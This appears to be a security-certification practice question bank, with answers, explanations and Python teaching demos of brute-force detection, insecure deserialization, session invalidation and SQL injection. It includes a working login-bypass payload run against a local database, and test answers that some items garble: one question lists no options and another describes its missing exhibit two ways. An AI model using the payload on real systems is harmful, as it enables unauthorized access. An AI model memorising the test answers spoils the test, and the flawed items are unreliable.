A security analyst reviews authentication logs and discovers hundreds of failed login attempts from a single external IP address within a five-minute window. All attempts target the same username 'jsmith' but use different passwords. Which type of password attack does this pattern most likely indicate?
A.Password spraying
B.Brute force
C.Credential stuffing
D.Dictionary attack
AnswerB
Correct. A brute force attack systematically tries many passwords against a single account. The log pattern of hundreds of different passwords for the same username matches this method.
Why this answer
The pattern of hundreds of failed login attempts from a single external IP address targeting the same username 'jsmith' with different passwords is characteristic of a brute force attack. In a brute force attack, the attacker systematically tries many password guesses against a single account to eventually find the correct credential. This contrasts with password spraying, where a few common passwords are tried against many usernames, and credential stuffing, which uses previously compromised username/password pairs from other breaches.
Exam trap
The trap here is confusing brute force with password spraying: candidates often pick password spraying because they see 'different passwords,' but the key differentiator is one target username versus many usernames, and that is what defines the attack type.
How to eliminate wrong answers
Option A is wrong because password spraying involves trying a small number of common passwords (e.g., 'Password123', 'Welcome1') against many different usernames to stay under lockout thresholds, not hundreds of different passwords against a single username. Option C is wrong because credential stuffing replays known username/password pairs from previous data breaches, so each account is typically tried once or a few times with a specific password, often with a mix of successes and failures, rather than one account being hit with hundreds of varying guesses. Option D is the closest distractor: a dictionary attack is a brute-force variant whose guesses come from a wordlist, but the logs alone do not show where the guesses come from, so the broader term, brute force, is the best answer.
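The three patterns above can be told apart mechanically from the shape of the failed-login events. The following is an added example, not code from the page or from any real SIEM: a small classifier run over constructed log lines. It assumes each event carries a short fingerprint of the attempted password (the `pw=` field), which most systems do not record; it is there only so the "different passwords" signal the question relies on is visible. The thresholds are assumptions and would be tuned per environment.

```python
"""Heuristic classification of failed-login patterns from authentication
logs (added example; the log lines are constructed, not from a real system)."""
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed line format (an assumption for the example):
# <ISO timestamp> src=<ip> user=<name> pw=<fingerprint> result=<ok|fail>
LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) pw=(?P<pw>\S+) result=(?P<result>ok|fail)$"
)

# Tunable thresholds (assumed values; real ones depend on the environment).
BRUTE_MIN_GUESSES = 10    # distinct passwords tried against one account
SPRAY_MIN_USERS = 5       # distinct accounts hit from one source
SPRAY_MAX_PASSWORDS = 3   # a spray reuses a handful of common passwords
STUFF_MIN_USERS = 5


@dataclass(frozen=True)
class Attempt:
    ts: str
    src: str
    user: str
    pw: str    # fingerprint of the guessed password (assumption: the app records one)
    ok: bool


def parse(log_text):
    """Return the auth events in the text; lines that are not auth events are skipped."""
    attempts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            attempts.append(Attempt(m["ts"], m["src"], m["user"], m["pw"], m["result"] == "ok"))
    return attempts


def classify_source(attempts):
    """Classify all attempts seen from one source address."""
    users = {a.user for a in attempts}
    pws = {a.pw for a in attempts}
    per_user = defaultdict(int)
    for a in attempts:
        per_user[a.user] += 1
    if len(users) == 1 and len(pws) >= BRUTE_MIN_GUESSES:
        return "brute force"                 # one account, many guesses
    if len(users) >= SPRAY_MIN_USERS and len(pws) <= SPRAY_MAX_PASSWORDS:
        return "password spraying"           # many accounts, the same few guesses
    if len(users) >= STUFF_MIN_USERS and len(pws) == len(attempts) and max(per_user.values()) == 1:
        return "credential stuffing"         # each account tried once with its own breached password
    return "unclassified"


def classify_log(log_text):
    by_src = defaultdict(list)
    for a in parse(log_text):
        by_src[a.src].append(a)
    return {src: classify_source(atts) for src, atts in by_src.items()}


def build_sample_log():
    """Constructed events: one source per pattern, plus an unrelated line."""
    lines = []
    for i in range(12):  # brute force: one source, one account, 12 different guesses
        lines.append(f"2024-05-01T09:00:{i:02d}Z src=203.0.113.7 user=jsmith pw=guess{i} result=fail")
    for i, u in enumerate(["alee", "bkim", "cdoe", "dpatel", "efox", "gwu"]):  # spray: two rounds
        lines.append(f"2024-05-01T09:10:{i:02d}Z src=198.51.100.9 user={u} pw=Welcome1 result=fail")
        lines.append(f"2024-05-01T09:40:{i:02d}Z src=198.51.100.9 user={u} pw=Password123 result=fail")
    pairs = [("hlin", "x1", "fail"), ("ikhan", "x2", "ok"), ("jroy", "x3", "fail"),
             ("kmo", "x4", "fail"), ("lyu", "x5", "fail")]
    for i, (u, pw, r) in enumerate(pairs):  # stuffing: breached pairs, one try each, one succeeds
        lines.append(f"2024-05-01T10:00:{i:02d}Z src=192.0.2.44 user={u} pw={pw} result={r}")
    lines.append("2024-05-01T10:05:00Z kernel: unrelated noise line")
    return "\n".join(lines)


if __name__ == "__main__":
    for src, verdict in classify_log(build_sample_log()).items():
        print(f"{src:15} {verdict}")
```

The point of the three rules is the one the question tests: the brute-force rule keys on a single username with many distinct guesses, the spraying rule on many usernames with few distinct guesses, and the stuffing rule on one attempt per account with a different password each time.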
A Java web service accepts a Base64-encoded `profile` object from the browser. During testing, changing a serialized field from `role=user` to `role=admin` causes a deserialization error unless the original signed blob is reused. When a captured valid blob is modified only slightly, the application reconstructs a different class and then exposes an internal admin page. Which attack pattern is most likely?
A.Insecure deserialization, because untrusted serialized data is being reconstructed into server-side objects.
B.SQL injection, because the attacker is changing a field to access a different page.
C.Cross-site request forgery, because the browser is sending a forged request to the application.
D.Cross-site scripting, because the modified object exposes an internal admin page.
AnswerA
Insecure deserialization is the best fit because the application accepts a serialized object from an untrusted source and turns it back into live server-side data. The fact that a small modification changes object behavior shows the server is trusting attacker-controlled serialized content. That can lead to authorization bypass, object confusion, or even code execution depending on the framework and validation controls.
Why this answer
The correct answer is A because the scenario describes a classic insecure deserialization weakness. The Java web service accepts a Base64-encoded serialized object from the browser and reconstructs it into live server-side objects. A wholesale edit (role=user to role=admin) fails unless the original signed blob is reused, but a slightly modified copy of a captured valid blob still gets deserialized and reconstructs a different class, which exposes an internal admin page. Whatever integrity check exists is therefore incomplete or bypassable, and the deserializer is letting attacker-controlled bytes decide which classes are instantiated.
This matches the insecure deserialization pattern from the OWASP Top 10 (A8:2017, folded into A08:2021 Software and Data Integrity Failures), where untrusted data is deserialized, leading to object injection and privilege escalation.
Exam trap
The trap here is that candidates may confuse the symptom (accessing an admin page) with a web-based attack like XSS or CSRF, but the root cause is the insecure deserialization of untrusted serialized data, not client-side script injection or request forgery.
How to eliminate wrong answers
Option B is wrong because SQL injection involves injecting malicious SQL queries into input fields to manipulate a database, not modifying serialized object fields to change server-side class behavior or access pages. Option C is wrong because cross-site request forgery (CSRF) relies on tricking a user's browser into sending an authenticated request to a target application, not on manipulating serialized data to alter server-side object reconstruction. Option D is wrong because cross-site scripting (XSS) involves injecting client-side scripts into web pages viewed by other users, not modifying serialized objects to cause server-side deserialization of a different class.
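The weakness is that the server rebuilds a live object, class included, from bytes the client chose, and that a signature which can be sidestepped is no signature at all. The following added example (not code from the page's service) uses Python's pickle as a stand-in for Java serialization, since both have that property; the key, class names and token format are assumptions. It shows an attacker supplying an admin object the service never meant to accept, then a hardened design that issues a data-only token and verifies an HMAC over the exact bytes before parsing anything.

```python
"""Untrusted object deserialization beside a signed, data-only alternative.
Added example; pickle stands in for Java serialization, and every name here
is invented for the demonstration."""
import base64
import hashlib
import hmac
import json
import pickle

SERVER_KEY = b"constructed-demo-key-do-not-reuse"  # assumption: a server-side secret


class Profile:
    def __init__(self, name, role):
        self.name = name
        self.role = role


class AdminProfile(Profile):
    """A class the service uses internally and never intended a client to supply."""
    def __init__(self, name):
        super().__init__(name, "admin")


def vulnerable_load(blob_b64: str) -> Profile:
    """Trusts the bytes: whatever class and fields the sender encoded come back alive."""
    return pickle.loads(base64.b64decode(blob_b64))


def forge_admin_blob() -> str:
    """What an attacker sends: their own serialized object, built without the server."""
    return base64.b64encode(pickle.dumps(AdminProfile("mallory"))).decode()


# Hardened design: the server issues a signed, data-only token and checks the
# signature over the exact bytes before parsing anything.
def _tag(data: bytes) -> str:
    return hmac.new(SERVER_KEY, data, hashlib.sha256).hexdigest()


def safe_issue(profile: dict) -> str:
    data = json.dumps(profile, sort_keys=True).encode()
    return base64.urlsafe_b64encode(data).decode() + "." + _tag(data)


def safe_load(token: str) -> dict:
    try:
        body, tag = token.split(".", 1)
        data = base64.urlsafe_b64decode(body)
    except ValueError:  # no separator, or not valid base64 (binascii.Error is a ValueError)
        raise ValueError("malformed token")
    if not hmac.compare_digest(_tag(data), tag):
        raise ValueError("bad signature")  # rejected before any parsing happens
    obj = json.loads(data)
    # Schema check: plain data with known keys and a whitelisted role; no class names.
    if (not isinstance(obj, dict) or set(obj) != {"name", "role"}
            or obj["role"] not in ("user", "admin")):
        raise ValueError("schema violation")
    return obj


def tamper(token: str) -> str:
    """Edit the payload of a genuine token while keeping its original tag."""
    body, tag = token.split(".", 1)
    data = base64.urlsafe_b64decode(body).replace(b'"user"', b'"admin"')
    return base64.urlsafe_b64encode(data).decode() + "." + tag


if __name__ == "__main__":
    forged = forge_admin_blob()
    obj = vulnerable_load(forged)
    print("vulnerable:", type(obj).__name__, obj.role)        # AdminProfile admin
    token = safe_issue({"name": "alice", "role": "user"})
    print("safe, genuine:", safe_load(token))
    for bad in (forged, tamper(token)):
        try:
            safe_load(bad)
        except ValueError as e:
            print("safe, rejected:", e)
```

Two design choices carry the weight: the token contains data, not an object graph, so the client cannot name a class; and the HMAC is checked with a constant-time compare over the raw bytes before `json.loads` runs, so a "slightly modified" blob never reaches the parser.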
A help desk technician reviews a ticket where a user says they logged out of the payroll portal, but another employee who found the session cookie in a browser debug log could still access the account until the session expired. Which attack best matches this behavior?
A.Session hijacking, because a stolen session token was reused to impersonate the user.
B.Pretexting, because the attacker pretended to be an authorized employee on a phone call.
C.CSRF, because the victim was tricked into sending unwanted requests from their browser.
D.Insecure deserialization, because serialized objects were accepted without validation.
AnswerA
If a valid session cookie can be reused by someone else, the attacker is effectively taking over the active session without knowing the password.
Why this answer
Option A is correct because the described behavior—where a session cookie stolen from a browser debug log is reused by another employee to access the payroll portal—is a classic session hijacking attack. Session hijacking occurs when an attacker captures a valid session token (e.g., a cookie containing a session ID) and uses it to impersonate the authenticated user, bypassing the need for credentials. In this case, the session cookie was not invalidated upon logout, allowing the attacker to reuse it until the session's expiration time.
Exam trap
The trap here is that candidates may confuse session hijacking with CSRF, but the key distinction is that session hijacking involves stealing and reusing an existing session token, whereas CSRF tricks the victim's browser into performing actions using the victim's own active session.
How to eliminate wrong answers
Option B is wrong because pretexting involves fabricating a scenario (e.g., a phone call) to trick a victim into divulging information, but the question describes a technical attack using a stolen session cookie, not social engineering. Option C is wrong because Cross-Site Request Forgery (CSRF) tricks a victim's browser into sending unwanted requests while the victim is authenticated, but here the attacker directly reuses a stolen session token without involving the victim's browser. Option D is wrong because insecure deserialization concerns the server reconstructing untrusted serialized objects; nothing was deserialized here, a valid token was simply reused.
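The root cause in the ticket is that logout only removed the cookie from the browser; the server kept honouring the token until its TTL ran out. The following added example (an in-memory store, not the payroll portal's code) runs the same sequence twice: the leaked token is presented after logout and again after expiry, first against a store that does not invalidate server-side and then against one that does. The clock and user names are constructed.

```python
"""Session handling that invalidates server-side on logout versus one that only
tells the browser to drop the cookie. Added example with an in-memory store."""
import secrets
import time
from typing import Dict, Optional, Tuple


class FakeClock:
    """Deterministic clock so the expiry behaviour can be shown without sleeping."""
    def __init__(self, start: float):
        self.now = start

    def advance(self, seconds: float) -> None:
        self.now += seconds

    def __call__(self) -> float:
        return self.now


class SessionStore:
    def __init__(self, ttl_seconds: int = 3600, invalidate_on_logout: bool = True, clock=time.time):
        self._sessions: Dict[str, Tuple[str, float]] = {}   # token -> (user, expires_at)
        self._ttl = ttl_seconds
        self._invalidate_on_logout = invalidate_on_logout
        self._clock = clock

    def login(self, user: str) -> str:
        # A fresh, unguessable token on every login (never carry a pre-login token over).
        token = secrets.token_urlsafe(32)
        self._sessions[token] = (user, self._clock() + self._ttl)
        return token   # sent as an HttpOnly, Secure, SameSite cookie; never written to logs

    def resolve(self, token: str) -> Optional[str]:
        """Map a presented cookie to a user, or None if unknown or expired."""
        entry = self._sessions.get(token)
        if entry is None:
            return None
        user, expires_at = entry
        if self._clock() >= expires_at:
            del self._sessions[token]
            return None
        return user

    def logout(self, token: str) -> None:
        if self._invalidate_on_logout:
            self._sessions.pop(token, None)      # any stolen copy dies with the record
        # Otherwise only the browser discards its cookie; the server still honours
        # the token until the TTL elapses, which is the behaviour in the ticket.


def simulate(invalidate_on_logout: bool) -> Tuple[Optional[str], Optional[str]]:
    """Return who the leaked token resolves to (after logout, after TTL expiry)."""
    clock = FakeClock(1_700_000_000.0)
    store = SessionStore(ttl_seconds=3600, invalidate_on_logout=invalidate_on_logout, clock=clock)
    token = store.login("alice")
    leaked = token                 # the copy a coworker found in a browser debug log
    store.logout(token)            # alice clicks "log out"
    clock.advance(60)
    after_logout = store.resolve(leaked)
    clock.advance(3600)
    after_expiry = store.resolve(leaked)
    return after_logout, after_expiry


if __name__ == "__main__":
    print("no server-side invalidation:", simulate(False))   # ('alice', None)
    print("invalidate on logout:      ", simulate(True))    # (None, None)
```

The first run reproduces the ticket: the hijacker is "alice" for the rest of the TTL. The second run is the fix. Keeping tokens out of debug logs and marking the cookie HttpOnly reduce how often a token leaks in the first place, but server-side invalidation is what makes logout mean something once it has.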
A security analyst receives an alert about a user account attempting to access multiple network shares in rapid succession within a short time frame. The analyst reviews the logs and sees that the IP address originates from the internal network, but the user is currently on leave. Which type of attack is most likely occurring?
A.Pass-the-hash attack
B.Brute-force attack
C.Credential stuffing attack
D.Internal reconnaissance
AnswerD
Internal reconnaissance involves an attacker who has already compromised a system and is now scanning internal resources to identify valuable data or further targets. The rapid access to multiple network shares aligns with this activity.
Why this answer
The correct answer is D because the behavior—an internal IP address rapidly querying multiple network shares—is characteristic of internal reconnaissance, where an attacker who has already gained a foothold maps out available resources. The user being on leave indicates the account is compromised, and the rapid succession of share access attempts is a classic sign of automated enumeration (e.g., using `net view` or SMB queries) rather than a direct credential attack.
Exam trap
The trap here is that candidates confuse the rapid enumeration of network shares with a brute-force or credential-based attack, failing to recognize that the attacker is already authenticated and is simply mapping the network for further exploitation.
How to eliminate wrong answers
Option A is wrong because a pass-the-hash attack uses captured NTLM hashes to authenticate without knowing the plaintext password, but the alert describes rapid share access, not a lateral movement technique that reuses a hash. Option B is wrong because a brute-force attack tries many passwords against a single account or service, whereas this scenario shows a single account attempting many shares, not repeated login failures. Option C is wrong because credential stuffing uses previously breached username/password pairs against multiple services, but the logs show a single internal IP accessing multiple shares, not login attempts across different applications or websites.
After a facilities outage, multiple employees report that their phones automatically joined a network named "CorpWiFi" in the lobby even though the legitimate access point was offline. A nearby attacker device then captured the captive portal login traffic. What attack is most likely?
A.Rogue access point
B.Evil twin
C.Bluetooth bluejacking
D.NFC relay attack
AnswerB
An evil twin mimics a trusted wireless network name and often a stronger signal to lure devices into connecting to it.
Why this answer
The correct answer is B, Evil twin. In this scenario, the attacker set up a rogue access point with the same SSID ("CorpWiFi") as the legitimate network, which was offline. When employees' phones automatically attempted to reconnect to a known SSID, they associated with the attacker's device, which then presented a fake captive portal to capture login credentials.
This is the classic definition of an evil twin attack: a fraudulent AP that mimics a legitimate one to intercept traffic.
Exam trap
The trap here is confusing an evil twin with a rogue access point; candidates often pick 'rogue access point' because both involve unauthorized APs, but the key distinction is that an evil twin mimics a legitimate SSID to intercept traffic, while a rogue AP is physically connected to the internal network.
How to eliminate wrong answers
Option A is wrong because a rogue access point is an unauthorized AP plugged into the corporate network, not a fake AP set up to mimic an offline legitimate AP; here the attacker's device is not connected to the corporate LAN. Option C is wrong because Bluetooth bluejacking involves sending unsolicited messages over Bluetooth, not capturing Wi-Fi captive portal traffic or spoofing an SSID. Option D is wrong because an NFC relay attack extends the range of an NFC transaction (e.g., contactless payment) by relaying signals between two devices, and does not involve Wi-Fi SSID spoofing or captive portal interception.
Based on the exhibit, what should the employee do first?
A.Reply with the code because the request appears to come from payroll support.
B.Report the message through the company’s phishing-report process and do not share the code.
C.Forward the email to coworkers so they can watch for the same request.
D.Open the attached file to see whether it contains the payroll fix details.
AnswerB
The message is a social engineering attempt that tries to pressure the user into revealing an MFA code. Reporting it quickly helps the security team investigate, warn others, and block related messages. The employee should never provide the code, even if the sender claims to be from payroll or support.
Why this answer
Option B is correct because the message exhibits classic social engineering indicators: an unsolicited request for a sensitive code, urgency, and a spoofed sender address. The employee must report it via the company's phishing-report process to alert the security team and must not share the code, as that would compromise the account. This aligns with security awareness training that emphasizes verifying requests out-of-band and never providing credentials or codes in response to email requests.
Exam trap
The trap here is that candidates may assume the email is legitimate because it appears to come from an internal department (payroll support) and uses urgent language, leading them to choose Option A or D, when in fact any unsolicited request for sensitive information or action should be treated as a potential phishing attempt.
How to eliminate wrong answers
Option A is wrong because replying with the code would directly compromise the employee's account, as the request is a phishing attempt, not a legitimate payroll support request. Option C is wrong because forwarding the email to coworkers could propagate the phishing attack and increase the number of compromised accounts, violating the principle of containment. Option D is wrong because opening an attached file from an unsolicited email could execute malware or trigger a credential-harvesting payload, even if the attachment appears to be a payroll fix document.
An employee receives an email that appears to come from the company's payroll provider. It says payroll documents will be deleted today unless the employee signs in through the included link. What is the best first action?
A.Click the link quickly and sign in to avoid losing the documents.
B.Report the message and verify the request using a trusted contact method.
C.Reply to the sender and ask whether the message is legitimate.
D.Forward the email to coworkers so they can watch for the same warning.
AnswerB
This avoids interacting with a potentially malicious message and confirms the request safely.
Why this answer
Option B is correct because the email exhibits classic signs of a phishing attack—urgency, a threat of data loss, and a link to a fake login page. The best first action is to report the suspicious message to the security team and independently verify the request by contacting the payroll provider through a trusted channel (e.g., a known phone number or a previously bookmarked URL). This prevents credential theft and potential account compromise.
Exam trap
The trap here is that candidates may think replying to the sender (Option C) is a safe way to verify legitimacy, but in reality, it confirms the email address as active and can expose the user to further social engineering or malware delivery.
How to eliminate wrong answers
Option A is wrong because clicking the link and signing in would directly hand over the employee's credentials to an attacker, enabling account takeover and potential lateral movement within the network. Option C is wrong because replying to the sender confirms the email address is active and monitored, which can lead to targeted follow-up attacks; the sender's address is likely spoofed or compromised, so the reply would go to the attacker. Option D is wrong because forwarding the email to coworkers spreads the phishing threat, increasing the number of potential victims and the attack surface; the correct procedure is to report the email to the security team for analysis and blocking.
A help desk technician reports several workstations are suddenly showing lots of pop-up ads and browser redirects after users installed a free media player. What type of unwanted software is most likely present?
A.Ransomware
B.Adware
C.Rootkit
D.Logic bomb
AnswerB
Adware commonly causes pop-ups, redirects, and unwanted advertising behavior after installation.
Why this answer
Adware is the most likely culprit because it is a type of unwanted software designed to display intrusive advertisements, often through pop-up ads and browser redirects. The infection vector—users installing a free media player—is a classic distribution method for adware, which bundles itself with legitimate software to generate revenue via ad impressions. Unlike ransomware or rootkits, adware does not encrypt files or hide its presence; it directly manipulates browser sessions to serve ads.
Exam trap
The trap here is that candidates may confuse the symptoms of adware with ransomware or a rootkit because pop-ups and redirects can sometimes be caused by more severe malware, but the specific context of a free media player installation points directly to adware as the most likely type of unwanted software.
How to eliminate wrong answers
Option A is wrong because ransomware encrypts files or locks the system and demands a ransom, which does not align with the symptoms of pop-up ads and browser redirects. Option C is wrong because a rootkit is designed to hide its presence and provide persistent, stealthy access to an attacker, not to generate visible pop-up ads or browser redirects. Option D is wrong because a logic bomb is a piece of code that executes a malicious function when a specific condition is met (e.g., a date or user action), and it does not cause ongoing ad displays or browser redirects.
A web login form uses unsanitized input in the backend query. When an attacker enters `' OR '1'='1'--` into the username field, the application grants access without a valid password. Which attack pattern is being used?
A.Cross-site scripting, because the attacker is trying to run code in the browser.
B.SQL injection, because the input changes the meaning of the database query.
C.Broken session management, because the user is still logged in after leaving the page.
D.Insecure deserialization, because the application accepts user input.
AnswerB
SQL injection occurs when untrusted input is embedded into a query and alters the intended logic. The crafted string closes the original condition and adds a statement that evaluates as true, which can bypass authentication checks. This is a classic sign that the application is constructing queries unsafely instead of using parameterized statements or properly bound variables.
Why this answer
Option B is correct because the attacker's input (`' OR '1'='1'--`) is a classic SQL injection payload that alters the structure of the backend SQL query. The leading quote closes the username literal, the tautology (`OR '1'='1'`) makes the WHERE clause true for every row, and `--` comments out the rest of the statement so the password comparison is never evaluated. The query returns rows (typically the first account in the table) and the application treats that as a successful login.
Exam trap
The trap here is that candidates may confuse SQL injection with cross-site scripting because both involve untrusted input, but SQL injection targets the database layer through query manipulation, whereas XSS targets the client-side DOM or browser execution context.
How to eliminate wrong answers
Option A is wrong because cross-site scripting (XSS) involves injecting client-side scripts (e.g., JavaScript) that execute in a user's browser, not altering a backend database query. Option C is wrong because broken session management refers to flaws in session token generation, handling, or expiration (e.g., predictable cookies or missing logout), not to input manipulation that changes a query's logic. Option D is wrong because insecure deserialization involves the processing of untrusted serialized objects (e.g., PHP or Java serialization streams) to achieve code execution or privilege escalation, not the injection of SQL syntax into a query string.
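The payload from the question, run for real against SQLite, as an added example that is not code from the page: the string-built query the question describes sits beside its parameterized replacement, and the same payload is sent to both. The schema, the single account and the password hashing are constructed for the demonstration.

```python
"""The injected login from the question, run against SQLite: a string-built
query beside the parameterized one. Added example; schema and user are constructed."""
import hashlib
import sqlite3
from typing import Optional


def _hash(password: str) -> str:
    # Stand-in for the example only; real systems use a salted, slow KDF (bcrypt, scrypt, Argon2).
    return hashlib.sha256(password.encode()).hexdigest()


def setup_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("alice", _hash("correct horse")))
    conn.commit()
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Untrusted input is spliced into the SQL text, so it can change the query's logic."""
    query = (
        f"SELECT username FROM users WHERE username = '{username}' "
        f"AND password_hash = '{_hash(password)}'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Placeholders keep the input as data; the quote and the comment are just characters."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password_hash = ?",
        (username, _hash(password)),
    ).fetchone()
    return row[0] if row else None


PAYLOAD = "' OR '1'='1'--"

if __name__ == "__main__":
    conn = setup_db()
    # Statement the database actually sees on the vulnerable path:
    # SELECT username FROM users WHERE username = '' OR '1'='1'--' AND password_hash = '...'
    print("vulnerable:    ", vulnerable_login(conn, PAYLOAD, "anything"))   # alice
    print("parameterized: ", safe_login(conn, PAYLOAD, "anything"))         # None
    print("genuine:       ", safe_login(conn, "alice", "correct horse"))    # alice
```

With placeholders the database receives the query text and the values separately, so the payload is compared against the username column as a literal string and matches nothing.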
Based on the exhibit, which social engineering attack is most likely?
A. Phishing
B. Vishing
C. Baiting
D. Pretexting
Answer: B
The attacker is using a phone call to impersonate support staff and pressure the user into sharing an MFA code. That is voice-based phishing, or vishing. The fabricated ticket number, urgency around payroll, and caller ID spoofing are classic social engineering clues. The goal is credential or factor theft through a believable phone pretext rather than a malicious link or attachment.
Why this answer
The exhibit shows a voicemail message instructing the recipient to call a specific phone number to verify account activity. This is a classic vishing (voice phishing) attack, where the attacker uses a phone call or voicemail to trick the victim into providing sensitive information or calling a fraudulent number. Unlike phishing, which uses email or text, vishing relies on voice communication channels.
Exam trap
The trap here is that candidates may confuse vishing with pretexting, but vishing specifically uses voice communication (phone call or voicemail) as the attack vector, whereas pretexting can occur via any medium and focuses on the fabricated story.
How to eliminate wrong answers
Option A is wrong because phishing typically involves email or text messages with malicious links or attachments, not a voicemail instructing a phone call. Option C is wrong because baiting involves offering something enticing (e.g., a free USB drive) to lure the victim into a trap, not a voice-based request. Option D is wrong because pretexting involves creating a fabricated scenario (pretext) to obtain information, often through impersonation, but the exhibit specifically uses a voicemail to initiate a phone call, which is the hallmark of vishing.
A public-facing file transfer server is running an appliance firmware version that is now end-of-life. The vendor has stated that no further security patches will be released. Management wants the best long-term fix before the next audit. What should be done?
A. Increase logging and keep the current firmware until a problem appears.
B. Move the server to a different subnet and continue using the same firmware.
C. Replace or upgrade the end-of-life firmware with a supported version.
D. Change the administrator password and leave the device in place.
Answer: C
Replacing or upgrading the unsupported firmware is the best long-term fix because it restores the ability to receive patches and vendor support. That directly addresses the outdated component risk instead of merely masking it with monitoring or network controls.
Why this answer
Option C is correct because running end-of-life firmware means no security patches will be released, leaving the server vulnerable to known exploits. The best long-term fix is to replace or upgrade to a supported firmware version that receives ongoing security updates, ensuring the system remains secure for the next audit and beyond.
Exam trap
CompTIA often tests the misconception that compensating controls like logging, segmentation, or password changes are sufficient to mitigate end-of-life vulnerabilities, when the only proper long-term fix is to upgrade or replace the unsupported software.
How to eliminate wrong answers
Option A is wrong because increasing logging does not address the underlying vulnerability; it only provides visibility into attacks without preventing them, and waiting for a problem to appear could lead to a breach. Option B is wrong because moving the server to a different subnet does not fix the firmware vulnerabilities; it only provides network segmentation, but the server remains exposed to attacks that exploit the unpatched firmware, and lateral movement from a compromised host could still occur. Option D is wrong because changing the administrator password does not remediate the known security flaws in the end-of-life firmware; it only addresses credential management, leaving the system vulnerable to remote code execution or other exploits that bypass authentication.
A security analyst is reviewing the source code of a custom network service written in C. The service allocates a 256-byte buffer and uses the strcpy() function to copy incoming data into that buffer without verifying the length of the input. If an attacker sends a specially crafted payload that exceeds 256 bytes, which security control would be most effective at detecting and preventing the resulting exploitation at runtime?
Correct. Stack canaries are placed before the return address on the stack. If a buffer overflow overwrites the canary, the program terminates, preventing control-flow hijacking. This is a highly effective runtime defense against stack-based buffer overflows.
Why this answer
Stack canaries are the most effective runtime control for detecting and preventing buffer overflow exploitation. When a buffer overflow overwrites the stack, it corrupts a canary value placed between the buffer and the return address; before the function returns, the canary is checked, and if altered, the program terminates immediately, preventing arbitrary code execution.
Exam trap
The trap here is that candidates often confuse runtime exploit mitigation (stack canaries) with network security controls (TLS) or software supply chain controls (code signing), leading them to pick a control that does not operate at the memory level during execution.
How to eliminate wrong answers
Option B is wrong because Transport Layer Security (TLS) encrypts data in transit and provides authentication, but it does not prevent or detect buffer overflows in application code—the overflow occurs after decryption. Option C is wrong because code signing verifies the integrity and origin of the binary before execution, but it offers no runtime protection against memory corruption vulnerabilities like buffer overflows.
A forum lets users save a profile signature. One user enters a string containing script code, and later other users who view that profile see the script run in their browsers. What attack is this?
A. Cross-site scripting
B. Command injection
C. CSRF
D. Broken authentication
Answer: A
This is cross-site scripting because attacker-supplied script code is stored and then executed when other users view the content. The dangerous part is that the payload is delivered through a trusted website and runs in the victim's browser. Stored XSS is a common issue in profiles, comments, and forums.
Why this answer
This is a classic stored cross-site scripting (XSS) attack. The malicious script is permanently stored on the server (in the user's profile signature) and executed in the browsers of any other user who views that profile. The attack exploits the forum's failure to sanitize user input before rendering it in HTML, allowing arbitrary JavaScript to run in the victim's session context.
Exam trap
The trap here is that candidates often confuse stored XSS with reflected XSS or CSRF, but the key distinction is that the payload is permanently stored on the server and executed for every viewer, not just the attacker or a single victim.
How to eliminate wrong answers
Option B (Command injection) is wrong because command injection involves injecting OS commands into a server-side application (e.g., via a web form or API) that executes them on the host system, not client-side script execution in a browser. Option C (CSRF) is wrong because cross-site request forgery tricks an authenticated user into performing unintended actions on a trusted site, not injecting and executing script code in a stored profile field. Option D (Broken authentication) is wrong because broken authentication refers to flaws in login, session management, or credential handling (e.g., weak passwords, session fixation), not the injection of client-side scripts into stored content.
An EDR alert shows PowerShell launching from a scheduled task, downloading encoded commands, and running them in memory. No suspicious executable is written to disk. What kind of attack is this?
A. A fileless attack that relies on trusted tools already on the system
B. A worm that spreads by exploiting a network service
C. A logic bomb that waits for a specific date or event
D. A rootkit that changes kernel behavior to hide processes
Answer: A
Fileless attacks often use legitimate tools like PowerShell and keep payloads in memory instead of writing files.
Why this answer
This is a fileless attack because PowerShell, a trusted system tool, is used to download and execute encoded commands directly in memory without writing any malicious executable to disk. The attack leverages living-off-the-land binaries (LOLBins) and PowerShell's ability to run scripts in memory, bypassing traditional file-based detection mechanisms.
Exam trap
The trap here is that candidates may confuse 'fileless' with 'no file at all,' but the attack still uses system files (PowerShell) and may leave traces in event logs or memory, leading them to incorrectly choose rootkit or logic bomb options due to misunderstanding the attack's execution method.
How to eliminate wrong answers
Option B is wrong because a worm spreads by self-replicating across a network, often exploiting a service vulnerability, but this scenario describes a scheduled task triggering PowerShell to download and run commands, not autonomous propagation. Option C is wrong because a logic bomb activates based on a specific date or event, but here the trigger is a scheduled task without mention of a conditional payload tied to time or user action. Option D is wrong because a rootkit modifies kernel-level behavior to hide processes or files, whereas this attack operates at the user level using PowerShell and does not alter the operating system kernel.
A laptop user reports that many files now have strange extensions, a ransom note appears on the desktop, and the files cannot be opened. Which malware is most likely responsible?
A. Spyware
B. Ransomware
C. Rootkit
D. Worm
Answer: B
Ransomware encrypts files or blocks access to systems and then demands payment for recovery. Strange file extensions and a ransom note are common signs that the malware has encrypted local data.
Why this answer
Ransomware is the correct answer because it encrypts the user's files, appends a new extension (e.g., .encrypted or .locked), and displays a ransom note demanding payment for the decryption key. The symptoms of inaccessible files with altered extensions and a visible ransom note are the classic indicators of a ransomware infection, such as those caused by CryptoLocker or LockBit.
Exam trap
The trap here is that candidates may confuse ransomware with a worm because both can spread rapidly, but the key differentiator is the ransom note and file encryption, which are unique to ransomware.
How to eliminate wrong answers
Option A is wrong because spyware is designed to covertly monitor user activity and steal sensitive information (e.g., keystrokes, browsing habits) without altering file extensions or displaying ransom notes. Option C is wrong because a rootkit is a stealthy malware that hides its presence and other malicious processes from the operating system, typically by modifying kernel-level functions, and does not encrypt files or leave ransom notes. Option D is wrong because a worm is a self-replicating malware that spreads across networks by exploiting vulnerabilities (e.g., SMB EternalBlue) and does not inherently encrypt files or display ransom notes; its primary goal is propagation, not extortion.
